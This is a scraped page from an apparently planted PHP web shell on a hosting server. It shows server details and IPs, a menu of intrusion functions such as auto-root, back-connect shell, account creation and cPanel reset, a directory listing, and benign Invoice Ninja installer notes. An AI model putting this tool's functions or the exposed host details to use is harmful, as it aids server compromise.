Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.219.119.163
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
ninja /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
1.36
KB
-rw-r--r--
clone.php
9.87
KB
-rw-r--r--
edit.php
4.24
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
extend.php
8.99
KB
-rw-r--r--
fileindex.php
568
B
-rw-r--r--
import.php
5.55
KB
-rw-r--r--
info.xml
4.73
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
8.92
KB
-rw-r--r--
install.xml
1.02
KB
-rw-r--r--
md5
1.26
KB
-rw-r--r--
notes.txt
2.03
KB
-rw-r--r--
soft_delete.php
3.12
KB
-rw-r--r--
update_pass.php
541
B
-rw-r--r--
upgrade.php
7.88
KB
-rw-r--r--
upgrade.xml
365
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. Set the debug to false in .env 2. Set the APP_ENV to production in .env 3. [NA] /public should be there in APP_URL in .env 4. Remove .git directory from original zip and then make a package. (Confirmed with vendor) 5. [NA] Select Email Settings Driver as "SMTP" in manual installation. 6. [NA] Fill following details in SMTP settings. From Address = Email address Username = Email address Encryption = SSL/TLS Host = smtp.gmail.com Port = 465 7. Add the following line to the .htaccess file in the root folder : <IfModule mod_alias.c> RedirectMatch 301 ^[[relativeurl]]/$ [[softurl]]/public/index.php </IfModule> 8. PHP REQUIREMENT LINK : https://invoiceninja.github.io/en/self-host-installation/ 9. Release date : https://github.com/invoiceninja/invoiceninja/releases 10. We exclude logo image path while upgrade i.e public/images/invoiceninja-logo.png since user's custom logo was getting overwritten post upgrade. (Check when we add upgrade) 11. Explicitly add DISABLE_AUTO_UPDATE=true in .env and keep the value true i.e 'disable_auto_update' => true in bootstrap/cache/config.php. (Confirmed with vendor via email) 12. Keep UPDATE_SECRET value in all installation through Softaculous as it is required for upgrade. 13. Since 5.3.31 .env.example has to be renamed to .env while manual installation, as mentioned here in the documentation link : https://invoiceninja.github.io/en/self-host-installation/#final-setup-steps and our conversation with vendor over email 14. Script gets installed in a sub-directory, however some of the functionality does not work. eg. Logo is not visible in invoice. Still we can make manual installation and test the script in a sub directory. (Since 5.9.4 version script only works in a root dir) 15. Download 'invoiceninja.tar' package from github. 16. We have set the cron for every minute referring to following guide and on users request on ticket. https://invoiceninja.github.io/en/self-host/#add-the-cron-job 17. In .env file Change MAIL_MAILER="smtp" to MAIL_MAILER="log" suggested by vendor for the login issue with different network
Close